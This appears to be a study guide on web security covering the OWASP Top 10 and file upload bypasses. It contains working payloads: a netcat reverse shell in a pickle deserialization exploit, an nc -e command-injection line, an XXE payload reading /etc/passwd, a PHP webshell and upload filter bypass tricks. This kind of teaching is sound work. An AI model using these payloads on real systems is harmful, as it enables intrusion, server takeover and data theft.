If we want to use Python modules in Burp Suite, we need to have downloaded and included the separate Jython Interpreter JAR file. The Jython interpreter is a Java implementation of Python. The website gives us the option to either install Jython to our system or download it as a standalone Java archive (JAR). We need it as a standalone archive to integrate it with Burp.

First up, we need to download an up-to-date copy of the Jython JAR archive from the Jython website. We are looking for the Jython Standalone option.

Save the JAR file somewhere on your disk, then switch to the "Options" sub-tab in Extender.

Scroll down to the "Python Environment" section, and set the "Location of Jython standalone JAR file" to the path of the archive.

Burp Suite API

Whilst coding our own modules is far outwith the scope of this module, it is worth looking (very briefly) at how such a task might be approached.

Extender exposes a large number of API Endpoints that new modules can hook into when integrating with Burp Suite.

We can view these in the "APIs" sub-tab.

OWASP Top 10

  • Injection
  • Broken Authentication
  • Sensitive Data Exposure
  • XML External Entity
  • Broken Access Control
  • Security Misconfiguration
  • Cross-site Scripting
  • Insecure Deserialization
  • Components with Known Vulnerabilities
  • Insufficent Logging & Monitoring


Injection flaws are very common in applications today. These flaws occur because user controlled input is interpreted as actual commands or parameters by the application. Injection attacks depend on what technologies are being used and how exactly the input is interpreted by these technologies. Some common examples include:

  • SQL Injection: This occurs when user controlled input is passed to SQL queries. As a result, an attacker can pass in SQL queries to manipulate the outcome of such queries.
  • Command Injection: This occurs when user input is passed to system commands. As a result, an attacker is able to execute arbitrary system commands on application servers.

If an attacker is able to successfully pass input that is interpreted correctly, they would be able to do the following:

  • Access, Modify and Delete information in a database when this input is passed into database queries. This would mean that an attacker can steal sensitive information such as personal details and credentials.
  • Execute Arbitrary system commands on a server that would allow an attacker to gain access to users’ systems. This would enable them to steal sensitive data and carry out more attacks against infrastructure linked to the server on which the command is executed.

The main defence for preventing injection attacks is ensuring that user controlled input is not interpreted as queries or commands. There are different ways of doing this:

  • Using an allow list: when input is sent to the server, this input is compared to a list of safe input or characters. If the input is marked as safe, then it is processed. Otherwise, it is rejected and the application throws an error.
  • Stripping input: If the input contains dangerous characters, these characters are removed before they are processed.

Dangerous characters or input is classified as any input that can change how the underlying data is processed. Instead of manually constructing allow lists or even just stripping input, there are various libraries that perform these actions for you.

OS Command Injection

Command Injection occurs when server-side code (like PHP) in a web application makes a system call on the hosting machine. It is a web vulnerability that allows an attacker to take advantage of that made system call to execute operating system commands on the server. Sometimes this won't always end in something malicious, like a whoami or just reading of files. That isn't too bad. But the thing about command injection is it opens up many options for the attacker. The worst thing they could do would be to spawn a reverse shell to become the user that the web server is running as. A simple ;nc -e /bin/bash is all that's needed and they own your server; some variants of netcat don't support the -e option. You can use a list of these reverse shells as an alternative.

Once the attacker has a foothold on the web server, they can start the usual enumeration of your systems and start looking for ways to pivot around. Now that we know what command injection is, we'll start going into the different types and how to test for them.

What is Active Command Injection?

Blind command injection occurs when the system command made to the server does not return the response to the user in the HTML document. Active command injection will return the response to the user. It can be made visible through several HTML elements.

Let's consider a scenario: EvilCorp has started development on a web based shell but has accidentally left it exposed to the Internet. It's nowhere near finished but contains the same command injection vulnerability as before! But this time, the response from the system call can be seen on the page! They'll never learn!

Just like before, let's look at the sample code from evilshell.php and go over what it's doing and why it makes it active command injection. See if you can figure it out. I'll go over it below just as before.


In pseudocode, the above snippet is doing the following: 1. Checking if the parameter "commandString" is set 2. If it is, then the variable $command_string gets what was passed into the input field 3. The program then goes into a try block to execute the function passthru($command_string). You can read the docs of passthru() on PHP's website, but in general, it is executing what gets entered into the input then passing the output directly back to the browser. 4. If the try does not succeed, output the error to page. Generally this won't output anything because you can't output stderr but PHP doesn't let you have a try without a catch.

Ways to Detect Active Command Injection

We know that active command injection occurs when you can see the response from the system call. In the above code, the function passthru() is actually what's doing all of the work here. It's passing the response directly to the document so you can see the fruits of your labor right there. Since we know that, we can go over some useful commands to try to enumerate the machine a bit further. The function call here to passthru() may not always be what's happening behind the scenes, but I felt it was the easiest and least complicated way to demonstrate the vulnerability.

Commands to try

Linux - whoami - id - ifconfig/ip addr - uname -a - ps -ef - lsb_release -a

Windows - whoami - ver - ipconfig - tasklist - netstat -an

Broken Authentication

Authentication and session management constitute core components of modern web applications. Authentication allows users to gain access to web applications by verifying their identities. The most common form of authentication is using a username and password mechanism. A user would enter these credentials, the server would verify them. If they are correct, the server would then provide the users’ browser with a session cookie. A session cookie is needed because web servers use HTTP(S) to communicate which is stateless. Attaching session cookies means that the server will know who is sending what data. The server can then keep track of users' actions.

If an attacker is able to find flaws in an authentication mechanism, they would then successfully gain access to other users’ accounts. This would allow the attacker to access sensitive data (depending on the purpose of the application). Some common flaws in authentication mechanisms include:

  • Brute force attacks: If a web application uses usernames and passwords, an attacker is able to launch brute force attacks that allow them to guess the username and passwords using multiple authentication attempts.
  • Use of weak credentials: web applications should set strong password policies. If applications allow users to set passwords such as ‘password1’ or common passwords, then an attacker is able to easily guess them and access user accounts. They can do this without brute forcing and without multiple attempts.
  • Weak Session Cookies: Session cookies are how the server keeps track of users. If session cookies contain predictable values, an attacker can set their own session cookies and access users’ accounts.

There can be various mitigation for broken authentication mechanisms depending on the exact flaw:

  • To avoid password guessing attacks, ensure the application enforces a strong password policy.
  • To avoid brute force attacks, ensure that the application enforces an automatic lockout after a certain number of attempts. This would prevent an attacker from launching more brute force attacks.
  • Implement Multi Factor Authentication - If a user has multiple methods of authentication, for example, using username and passwords and receiving a code on their mobile device, then it would be difficult for an attacker to get access to both credentials to get access to their account.

Sensitive Data Exposure

When a webapp accidentally divulges sensitive data, we refer to it as "Sensitive Data Exposure". This is often data directly linked to customers (e.g. names, dates-of-birth, financial information, etc), but could also be more technical information, such as usernames and passwords. At more complex levels this often involves techniques such as a "Man in The Middle Attack", whereby the attacker would force user connections through a device which they control, then take advantage of weak encryption on any transmitted data to gain access to the intercepted information (if the data is even encrypted in the first place...). Of course, many examples are much simpler, and vulnerabilities can be found in web apps which can be exploited without any advanced networking knowledge. Indeed, in some cases, the sensitive data can be found directly on the webserver itself...

The most common way to store a large amount of data in a format that is easily accessible from many locations at once is in a database. This is obviously perfect for something like a web application, as there may be many users interacting with the website at any one time. Database engines usually follow the Structured Query Language (SQL) syntax; however, alternative formats (such as NoSQL) are rising in popularity.

In a production environment it is common to see databases set up on dedicated servers, running a database service such as MySQL or MariaDB; however, databases can also be stored as files. These databases are referred to as "flat-file" databases, as they are stored as a single file on the computer. This is much easier than setting up a full database server, and so could potentially be seen in smaller web applications. Accessing a database server is outwith the scope of today's task, so let's focus instead on flat-file databases.

As mentioned previously, flat-file databases are stored as a file on the disk of a computer. Usually this would not be a problem for a webapp, but what happens if the database is stored underneath the root directory of the website (i.e. one of the files that a user connecting to the website is able to access)? Well, we can download it and query it on our own machine, with full access to everything in the database. Sensitive Data Exposure indeed!

The most common (and simplest) format of flat-file database is an sqlite database. These can be interacted with in most programming languages, and have a dedicated client for querying them on the command line. This client is called "sqlite3", and is installed by default on Kali.

Access a database: sqlite3 <db_name>

Show tables: .tables

Show table informations: PRAGMA table_info(<table_name>)

Dump informations from table: SELECT * FROM customers;

Once you've found sensitive data like hashes, you can try to crack them.

When it comes to hash cracking, Kali comes pre-installed with various tools -- if you know how to use these then feel free to do so; however, they are outwith the scope of this material.

Instead we will be using the online tool: Crackstation. This website is extremely good at cracking weak password hashes. For more complicated hashes we would need more sophisticated tools; however, all of the crackable password hashes used in today's challenge are weak MD5 hashes, which Crackstation should handle very nicely indeed.

XML External Entity

An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.

There are two types of XXE attacks: in-band and out-of-band (OOB-XXE). 1) An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.

2) out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.

What is XML?

XML (eXtensible Markup Language) is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is a markup language used for storing and transporting data.

Why we use XML?

  1. XML is platform-independent and programming language independent, thus it can be used on any system and supports the technology change when that happens.

  2. The data stored and transported using XML can be changed at any point in time without affecting the data presentation.

  3. XML allows validation using DTD and Schema. This validation ensures that the XML document is free from any syntax error.

  4. XML simplifies data sharing between various systems because of its platform-independent nature. XML data doesn’t require any conversion when transferred between different systems.


Every XML document mostly starts with what is known as XML Prolog.

<?xml version="1.0" encoding="UTF-8"?>

Above the line is called XML prolog and it specifies the XML version and the encoding used in the XML document. This line is not compulsory to use but it is considered a good practice to put that line in all your XML documents.

Every XML document must contain a ROOT element. For example:

<?xml version="1.0" encoding="UTF-8"?>
   <subject>About XXE</subject>
   <text>Teach about XXE</text>

In the above example the <mail> is the ROOT element of that document and <to>, <from>, <subject>, <text> are the children elements. If the XML document doesn't have any root element then it would be considered wrong or invalid XML doc.

Another thing to remember is that XML is a case sensitive language. If a tag starts like <to> then it has to end by </to> and not by something like </To>(notice the capitalization of T)

Like HTML we can use attributes in XML too. The syntax for having attributes is also very similar to HTML. For example:

<text category = "message">You need to learn about XXE</text>

In the above example category is the attribute name and message is the attribute value.


DTD stands for Document Type Definition. A DTD defines the structure and the legal elements and attributes of an XML document.

Let us try to understand this with the help of an example. Say we have a file named note.dtd with the following content:

<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>

Now we can use this DTD to validate the information of some XML document and make sure that the XML file conforms to the rules of that DTD.

Ex: Below is given an XML document that uses note.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "note.dtd">
    <body>XXE attack</body>

So now let's understand how that DTD validates the XML. Here's what all those terms used in note.dtd mean

  • !DOCTYPE note - Defines a root element of the document named note
  • !ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"
  • !ELEMENT to - Defines the to element to be of type "#PCDATA"
  • !ELEMENT from - Defines the from element to be of type "#PCDATA"
  • !ELEMENT heading - Defines the heading element to be of type "#PCDATA"
  • !ELEMENT body - Defines the body element to be of type "#PCDATA"

NOTE: #PCDATA means parseable character data.

XXE Payload

Now we'll see some XXE payload and see how they are working.

  1. The first payload we'll see is very simple. If you've read the previous task properly then you'll understand this payload very easily.
<!DOCTYPE replace [<!ENTITY name "feast"> ]>

As we can see we are defining a ENTITY called name and assigning it a value feast. Later we are using that ENTITY in our code.

  1. We can also use XXE to read some file from the system by defining an ENTITY and having it use the SYSTEM keyword
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>

Here again, we are defining an ENTITY with the name `read` but the difference is that we are setting it value to `SYSTEM` and path of the file.

If we use this payload then a website vulnerable to XXE(normally) would display the content of the file `/etc/passwd`.

In a similar manner, we can use this kind of payload to read other files but a lot of times you can fail to read files in this manner or the reason for failure could be the file you are trying to read.

### Broken Access Control
Websites have pages that are protected from regular visitors, for example only the site's admin user should be able to access a page to manage other users. If a website visitor is able to access the protected page/pages that they are not authorised to view, the access controls are broken.

A regular visitor being able to access protected pages, can lead to the following:
- Being able to view sensitive information
- Accessing unauthorized functionality

OWASP have a listed a few attack scenarios demonstrating access control weaknesses:

**Scenario #1**: The application uses unverified data in a SQL call that is accessing account information:

        pstmt.setString(1, request.getParameter("acct"));
        ResultSet results = pstmt.executeQuery( );

An attacker simply modifies the ‘acct’ parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user’s account.

**Scenario #2**: An attacker simply force browses to target URLs. Admin rights are required for access to the admin page.

To put simply, broken access control allows attackers to bypass authorization which can allow them to view sensitive data or perform tasks as if they were a privileged user.

#### IDOR
IDOR, or **Insecure Direct Object Reference**, is the act of exploiting a misconfiguration in the way user input is handled, to access resources you wouldn't ordinarily be able to access. IDOR is a type of access control vulnerability.

For example, let's say we're logging into our bank account, and after correctly authenticating ourselves, we get taken to a URL like this On that page we can see all our important bank details, and a user would do whatever they needed to do and move along their way thinking nothing is wrong.

There is however a potentially huge problem here, a hacker may be able to change the account_number parameter to something else like 1235, and if the site is incorrectly configured, then he would have access to someone else's bank information.

### Security Misconfiguration
Security Misconfigurations are distinct from the other Top 10 vulnerabilities, because they occur when security could have been configured properly but was not.

Security misconfigurations include:
- Poorly configured permissions on cloud services, like S3 buckets
- Having unnecessary features enabled, like services, pages, accounts or privileges
- Default accounts with unchanged passwords
- Error messages that are overly detailed and allow an attacker to find out more about the system
- Not using HTTP security headers, or revealing too much detail in the Server: HTTP header

This vulnerability can often lead to more vulnerabilities, such as default credentials giving you access to sensitive data, XXE or command injection on admin pages.

For more info, I recommend having a look at the [OWASP top 10 entry for Security Misconfiguration](

#### Default Passwords
Specifically, this VM focusses on default passwords. These are a specific example of a security misconfiguration. You could, and should, change any default passwords but people often don't.

It's particularly common in embedded and Internet of Things devices, and much of the time the owners don't change these passwords.

It's easy to imagine the risk of default credentials from an attacker's point of view. Being able to gain access to admin dashboards, services designed for system administrators or manufacturers, or even network infrastructure could be incredibly useful in attacking a business. From data exposure to easy RCE, the effects of default credentials can be severe.

In October 2016, Dyn (a DNS provider) was taken offline by one of the most memorable DDoS attacks of the past 10 years. The flood of traffic came mostly from Internet of Things and networking devices like routers and modems, infected by the Mirai malware.

How did the malware take over the systems? Default passwords. The malware had a list of 63 username/password pairs, and attempted to log in to exposed telnet services.

The DDoS attack was notable because it took many large websites and services offline. Amazon, Twitter, Netflix, GitHub, Xbox Live, PlayStation Network, and many more services went offline for several hours in 3 waves of DDoS attacks on Dyn.

### Cross-site Scripting
#### XSS Explained
Cross-site scripting, also known as XSS is a security vulnerability typically found in web applications. It’s a type of injection which can allow an attacker to execute malicious scripts and have it execute on a victim’s machine.

A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS. There are three main types of cross-site scripting:

- **Stored XSS** - the most dangerous type of XSS. This is where a malicious string originates from the website’s database. This often happens when a website allows user input that is not sanitised (remove the "bad parts" of a users input) when inserted into the database.
- **Reflected XSS** - the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
- **DOM-Based XSS** - DOM stands for Document Object Model and is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style and content. A web page is a document and this document can be either displayed in the browser window or as the HTML source.

#### XSS Payloads
Remember, cross-site scripting is a vulnerability that can be exploited to execute malicious Javascript on a victim’s machine. Check out some common payloads types used:

- Popup's `(<script>alert(“Hello World”)</script>)` - Creates a Hello World message popup on a users browser.
- Writing HTML (document.write) - Override the website's HTML to add your own (essentially defacing the entire page).
- XSS Keylogger ( - You can log all keystrokes of a user, capturing their password and other sensitive information they type into the webpage.
- Port scanning ( - A mini local port scanner (more information on this is covered in the TryHackMe XSS room). ( is a website that has XSS related Payloads, Tools, Documentation and more. You can download XSS payloads that take snapshots from a webcam or even get a more capable port and network scanner.

### Insecure Deserialization
This definition is still quite broad to say the least. Simply, insecure deserialization is replacing data processed by an application with malicious code; allowing anything from DoS (Denial of Service) to RCE (Remote Code Execution) that the attacker can use to gain a foothold in a pentesting scenario.

Specifically, this malicious code leverages the legitimate serialization and deserialization process used by web applications. We'll be explaining this process and why it is so commonplace in modern web applications.

*OWASP rank this vulnerability as 8 out of 10 because of the following reasons:*

- Low exploitability. This vulnerability is often a case-by-case basis - there is no reliable tool/framework for it. Because of its nature, attackers need to have a good understanding of the inner-workings of the ToE.

- The exploit is only as dangerous as the attacker's skill permits, more so, the value of the data that is exposed. For example, someone who can only cause a DoS will make the application unavailable. The business impact of this will vary on the infrastructure - some organisations will recover just fine, others, however, will not.

#### What's Vulnerable?
At summary, ultimately, any application that stores or fetches data where there are no validations or integrity checks in place for the data queried or retained. A few examples of applications of this nature are:

- E-Commerce Sites
- Forums
- API's
- Application Runtimes (Tomcat, Jenkins, Jboss, etc)

#### Objects
A prominent element of object-oriented programming (OOP), objects are made up of two things:
- State
- Behaviour

Simply, objects allow you to create similar lines of code without having to do the leg-work of writing the same lines of code again.

For example, a lamp would be a good object. Lamps can have different types of bulbs, this would be their state, as well as being either on/off - their behaviour!

Rather than having to accommodate every type of bulb and whether or not that specific lamp is on or off, you can use methods to simply alter the state and behaviour of the lamp.

#### De(Serialization)
*Learning is best done through analogies*

A Tourist approaches you in the street asking for directions. They're looking for a local landmark and got lost. Unfortunately, English isn't their strong point and nor do you speak their dialect either. What do you do? You draw a map of the route to the landmark because pictures cross language barriers, they were able to find the landmark. Nice! You've just serialised some information, where the tourist then deserialised it to find the landmark.

#### Continued
Serialisation is the process of converting objects used in programming into simpler, compatible formatting for transmitting between systems or networks for further processing or storage.

Alternatively, deserialisation is the reverse of this; converting serialised information into their complex form - an object that the application will understand.

#### What does this mean?
Say you have a password of "password123" from a program that needs to be stored in a database on another system. To travel across a network this string/output needs to be converted to binary. Of course, the password needs to be stored as "password123" and not its binary notation. Once this reaches the database, it is converted or deserialised back into "password123" so it can be stored.

#### How can we leverage this?
Simply, insecure deserialization occurs when data from an untrusted party (I.e. a hacker) gets executed because there is no filtering or input validation; the system assumes that the data is trustworthy and will execute it no holds barred.

#### Cookies 101
Ah yes, the origin of many memes. Cookies are an essential tool for modern websites to function. Tiny pieces of data, these are created by a website and stored on the user's computer. 

Whilst plaintext credentials is a vulnerability in itself, it is not insecure deserialization as we have not sent any serialized data to be executed!

Cookies are not permanent storage solutions like databases. Some cookies such as session ID's will clear when the browser is closed, others, however, last considerably longer. This is determined by the "Expiry" timer that is set when the cookie is created.

*Some cookies have additional attributes, a small list of these are below:*

| Attribute  | Description  | Required? |
| ---------- | ----------- | --------- |
| Cookie Name   | The Name of the Cookie to be set  | Yes |
| Cookie Value  | Value, this can be anything plaintext or encoded |    Yes |
| Secure Only   | If set, this cookie will only be set over HTTPS connections   | No |
| Expiry    | Set a timestamp where the cookie will be removed from the browser | No |
| Path  | The cookie will only be sent if the specified URL is within the request   | No |

#### Creating Cookies
Cookies can be set in various website programming languages. For example, Javascript, PHP or Python to name a few. The following web application is developed using Python's Flask, so it is fitting to use it as an example.

*Take the snippet below:*
dateTime =
timestamp = str(dateTime)
resp.set_cookie("registrationTimestamp", timestamp)

Setting cookies in Flask is rather trivial. Simply, this snippet gets the current date and time, stores it within the variable "timestamp" and then stores the date and time in a cookie named "registrationTimestamp".

It's as simple as that.

Code execution

An example of insecure deserialization leading to RCE. Let's assume the application uses pickleto serialize and unserialize a cookie.


cookie = { "replaceme":payload}
pickle_payload = pickle.dumps(cookie)
encodePayloadCookie = base64.b64encode(pickle_payload)
resp = make_response(redirect("/myprofile"))
resp.set_cookie("encodedPayload", encodePayloadCookie)


cookie = request.cookies.get("encodedPayload")
cookie = pickle.loads(base64.b64decode(cookie))

With this vulnerability, we can spawn a reverse-shell. But commands must be encoded in base64. You can download a python reverse-shell which exploits the the vulnerability through python pickle.

import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR__IP 4444 > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))



Then, replace your cookie's value with the encoded payload and start to listen on the port 4444: nc -lnvp 4444.

Refresh the page and you should obtain a shell:


Components With Known Vulnerabilities

Occasionally, you may find that the company/entity that you're pen-testing is using a program that already has a well documented vulnerability.

For example, let's say that a company hasn't updated their version of WordPress for a few years, and using a tool such as wpscan, you find that it's version 4.6. Some quick research will reveal that WordPress 4.6 is vulnerable to an unauthenticated remote code execution(RCE) exploit, and even better you can find an exploit already made on exploit-db.

As you can see this would be quite devastating, because it requires very little work on the part of the attacker as often times since the vulnerability is already well known, someone else has made an exploit for the vulnerability. The situation becomes even worse when you realize, that it's really quite easy for this to happen, if a company misses a single update for a program they use, they could be vulnerable to any number of attacks.

Hence, why OWASP has rated this a 3(meaning high) on the prevalence scale, it is incredibly easy for a company to miss an update for an application.

Insufficient Logging and Monitoring

When web applications are set up, every action performed by the user should be logged. Logging is important because in the event of an incident, the attackers actions can be traced. Once their actions are traced, their risk and impact can be determined. Without logging, there would be no way to tell what actions an attacker performed if they gain access to particular web applications. The bigger impacts of these include:

  • regulatory damage: if an attacker has gained access to personally identifiable user information and there is no record of this, not only are users of the application affected, but the application owners may be subject to fines or more severe actions depending on regulations.
  • risk of further attacks: without logging, the presence of an attacker may be undetected. This could allow an attacker to launch further attacks against web application owners by stealing credentials, attacking infrastructure and more.

The information stored in logs should include: - HTTP status codes - Time Stamps - Usernames - API endpoints/page locations - IP addresses

These logs do have some sensitive information on them so its important to ensure that logs are stored securely and multiple copies of these logs are stored at different locations.

As you may have noticed, logging is more important after a breach or incident has occurred. The ideal case is having monitoring in place to detect any suspicious activity. The aim of detecting this suspicious activity is to either stop the attacker completely or reduce the impact they've made if their presence has been detected much later than anticipated. Common examples of suspicious activity includes:

  • multiple unauthorised attempts for a particular action (usually authentication attempts or access to unauthorised resources e.g. admin pages)
  • requests from anomalous IP addresses or locations: while this can indicate that someone else is trying to access a particular user's account, it can also have a false positive rate.
  • use of automated tools: particular automated tooling can be easily identifiable e.g. using the value of User-Agent headers or the speed of requests. This can indicate an attacker is using automated tooling.
  • common payloads: in web applications, it's common for attackers to use Cross Site Scripting (XSS) payloads. Detecting the use of these payloads can indicate the presence of someone conducting unauthorised/malicious testing on applications.

Just detecting suspicious activity isn't helpful. This suspicious activity needs to be rated according to the impact level. For example, certain actions will higher impact than others. These higher impact actions need to be responded to sooner thus they should raise an alarm which raises the attention of the relevant party.

Upload Vulnerabilities

The ability to upload files to a server has become an integral part of how we interact with web applications. Be it a profile picture for a social media website, a report being uploaded to cloud storage, or saving a project on Github; the applications for file upload features are limitless.

Unfortunately, when handled badly, file uploads can also open up severe vulnerabilities in the server. This can lead to anything from relatively minor, nuisance problems; all the way up to full Remote Code Execution (RCE) if an attacker manages to upload and execute a shell. With unrestricted upload access to a server (and the ability to retrieve data at will), an attacker could deface or otherwise alter existing content -- up to and including injecting malicious webpages, which lead to further vulnerabilities such as XSS or CSRF. By uploading arbitrary files, an attacker could potentially also use the server to host and/or serve illegal content, or to leak sensitive information. Realistically speaking, an attacker with the ability to upload a file of their choice to your server -- with no restrictions -- is very dangerous indeed.

The vulnerabilities resulting from improper (or inadequate) handling of file uploads: - Overwriting existing files on a server - Uploading and Executing Shells on a server - Bypassing Client-Side filtering - Bypassing various kinds of Server-Side filtering - Fooling content type validation checks


So, we have a file upload point on a site. How would we go about exploiting it?

As with any kind of hacking, enumeration is key. The more we understand about our environment, the more we're able to do with it. Looking at the source code for the page is good to see if any kind of client-side filtering is being applied. Scanning with a directory bruteforcer such as Gobuster is usually helpful in web attacks, and may reveal where files are being uploaded to; Gobuster is no longer installed by default on Kali, but can be installed with sudo apt install gobuster. Intercepting upload requests with Burpsuite will also come in handy. Browser extensions such as Wappalyser can provide valuable information at a glance about the site you're targetting.

With a basic understanding of how the website might be handling our input, we can then try to poke around and see what we can and can't upload. If the website is employing client-side filtering then we can easily look at the code for the filter and look to bypass it (more on this later!). If the website has server-side filtering in place then we may need to take a guess at what the filter is looking for, upload a file, then try something slightly different based on the error message if the upload fails. Uploading files designed to provoke errors can help with this. Tools like Burpsuite or OWASP Zap can be very helpful at this stage.


Example of webshell:

    echo system($_GET["cmd"]);

An example of reverse shell


  • Client-side: Easy to bypass because the verification is made on the computer's client
  • Server-side: More difficult to bypass, the code isn't in front fo you.

Extension Validation: File extensions are used (in theory) to identify the contents of a file. In practice they are very easy to change, so actually don't mean much. Filters that check for extensions work in one of two ways. They either blacklist extensions (i.e. have a list of extensions which are not allowed) or they whitelist extensions (i.e. have a list of extensions which are allowed, and reject everything else).

File Type Filtering: Similar to Extension validation, but more intensive, file type filtering looks, once again, to verify that the contents of a file are acceptable to upload. We'll be looking at two types of file type validation:

  • MIME validation: MIME (Multipurpose Internet Mail Extension) types are used as an identifier for files -- originally when transfered as attachments over email, but now also when files are being transferred over HTTP(S). The MIME type for a file upload is attached in the header of the request, and looks something like this:


MIME types follow the format <type>/<subtype>. In the request above, you can see that the image "spaniel.jpg" was uploaded to the server. As a legitimate JPEG image, the MIME type for this upload was "image/jpeg". The MIME type for a file can be checked client-side and/or server-side; however, as MIME is based on the extension of the file, this is extremely easy to bypass. - Magic Number validation: Magic numbers are the more accurate way of determining the contents of a file; although, they are by no means impossible to fake. The "magic number" of a file is a string of bytes at the very beginning of the file content which identify the content. For example, a PNG file would have these bytes at the very top of the file: 89 50 4E 47 0D 0A 1A 0A.


Unlike Windows, Unix systems use magic numbers for identifying files; however, when dealing with file uploads, it is possible to check the magic number of the uploaded file to ensure that it is safe to accept. This is by no means a guaranteed solution, but it's more effective than checking the extension of a file.

File Length Filtering: File length filters are used to prevent huge files from being uploaded to the server via an upload form (as this can potentially starve the server of resources). In most cases this will not cause us any issues when we upload shells; however, it's worth bearing in mind that if an upload form only expects a very small file to be uploaded, there may be a length filter in place to ensure that the file length requirement is adhered to. As an example, our fully fledged PHP reverse shell from the previous task is 5.4Kb big -- relatively tiny, but if the form expects a maximum of 2Kb then we would need to find an alternative shell to upload.

File Name Filtering: As touched upon previously, files uploaded to a server should be unique. Usually this would mean adding a random aspect to the file name, however, an alternative strategy would be to check if a file with the same name already exists on the server, and give the user an error if so. Additionally, file names should be sanitised on upload to ensure that they don't contain any "bad characters", which could potentially cause problems on the file system when uploaded (e.g. null bytes or forward slashes on Linux, as well as control characters such as ; and potentially unicode characters). What this means for us is that, on a well administered system, our uploaded files are unlikely to have the same name we gave them before uploading, so be aware that you may have to go hunting for your shell in the event that you manage to bypass the content filtering.

File Content Filtering: More complicated filtering systems may scan the full contents of an uploaded file to ensure that it's not spoofing its extension, MIME type and Magic Number. This is a significantly more complex process than the majority of basic filtration systems employ, and thus will not be covered in this room.

Bypass Client-Side Filtering

There are four easy ways to bypass your average client-side file upload filter:

  • Turn off Javascript in your browser -- this will work provided the site doesn't require Javascript in order to provide basic functionality. If turning off Javascript completely will prevent the site from working at all then one of the other methods would be more desirable; otherwise, this can be an effective way of completely bypassing the client-side filter.
  • Intercept and modify the incoming page. Using Burpsuite, we can intercept the incoming web page and strip out the Javascript filter before it has a chance to run. The process for this will be covered below.
  • Intercept and modify the file upload. Where the previous method works before the webpage is loaded, this method allows the web page to load as normal, but intercepts the file upload after it's already passed (and been accepted by the filter). Again, we will cover the process for using this method in the course of the task.
  • Send the file directly to the upload point. Why use the webpage with the filter, when you can send the file directly using a tool like curl? Posting the data directly to the page which contains the code for handling the file upload is another effective method for completely bypassing a client side filter. We will not be covering this method in any real depth in this tutorial, however, the syntax for such a command would look something like this: curl -X POST -F "submit:<value>" -F "<file-parameter>:@<path-to-file>" <site>. To use this method you would first aim to intercept a successful upload (using Burpsuite or the browser console) to see the parameters being used in the upload, which can then be slotted into the above command.

Example of Intercepting and modifying the file upload: Observe that the MIME type of our PHP shell is currently image/jpeg. We'll change this to text/x-php, and the file extension from .jpg to .php, then forward the request to the server.

Bypass Server-Side Filtering: File Extensions

Client-side filters are easy to bypass -- you can see the code for them, even if it's been obfuscated and needs processed before you can read it; but what happens when you can't see or manipulate the code? Well, that's a server-side filter. In short, we have to perform a lot of testing to build up an idea of what is or is not allowed through the filter, then gradually put together a payload which conforms to the restrictions.


    //Get the extension
    $extension = pathinfo($_FILES["fileToUpload"]["name"])["extension"];
    //Check the extension against the blacklist -- .php and .phtml
        case "php":
        case "phtml":
        case NULL:
            $uploadFail = True;
            $uploadFail = False;

In this instance, the code is looking for the last period (.) in the file name and uses that to confirm the extension, so that is what we'll be trying to bypass here. Other ways the code could be working include: searching for the first period in the file name, or splitting the file name at each period and checking to see if any blacklisted extensions show up. We'll cover this latter case later on, but in the meantime, let's focus on the code we've got here.

We can see that the code is filtering out the .php and .phtml extensions, so if we want to upload a PHP script we're going to have to find another extension. The wikipedia page for PHP gives us a few common extensions that we can try; however, there are actually a variety of other more rarely used extensions available that webservers may nonetheless still recognise. These include: .php3, .php4, .php5, .php7, .phps, .php-s, .pht and .phar.

In the previous example we saw that the code was using the pathinfo() PHP function to get the last few characters after the ., but what happens if it filters the input slightly differently?

Let's try uploading a file called shell.jpg.php. We already know that JPEG files are accepted, so what if the filter is just checking to see if the .jpg file extension is somewhere within the input?

Bypass Server-Side Filtering: Magic numbers

Magic numbers are used as a more accurate identifier of files. The magic number of a file is a string of hex digits, and is always the very first thing in a file. Knowing this, it's possible to use magic numbers to validate file uploads, simply by reading those first few bytes and comparing them against either a whitelist or a blacklist. Bear in mind that this technique can be very effective against a PHP based webserver; however, it can sometimes fail against other types of webserver (hint hint).

For example, magic bytes of JPEG are FF D8 FF DB. So let's add four random characters at the beginning of the php file and modify them with the magic bytes of JPEG.

You cand do this with hexeditor. Then, the file is identified as JPEG.

Example Methodology

We'll look at this as a step-by-step process. Let's say that we've been given a website to perform a security audit on.

  • The first thing we would do is take a look at the website as a whole. Using browser extensions such as the aforementioned Wappalyzer (or by hand) we would look for indicators of what languages and frameworks the web application might have been built with. Be aware that Wappalyzer is not always 100% accurate. A good start to enumerating this manually would be by making a request to the website and intercepting the response with Burpsuite. Headers such as server or x-powered-by can be used to gain information about the server. We would also be looking for vectors of attack, like, for example, an upload page.
  • Having found an upload page, we would then aim to inspect it further. Looking at the source code for client-side scripts to determine if there are any client-side filters to bypass would be a good thing to start with, as this is completely in our control.
  • We would then attempt a completely innocent file upload. From here we would look to see how our file is accessed. In other words, can we access it directly in an uploads folder? Is it embedded in a page somewhere? What's the naming scheme of the website? This is where tools such as Gobuster might come in if the location is not immediately obvious. This step is extremely important as it not only improves our knowledge of the virtual landscape we're attacking, it also gives us a baseline "accepted" file which we can base further testing on.
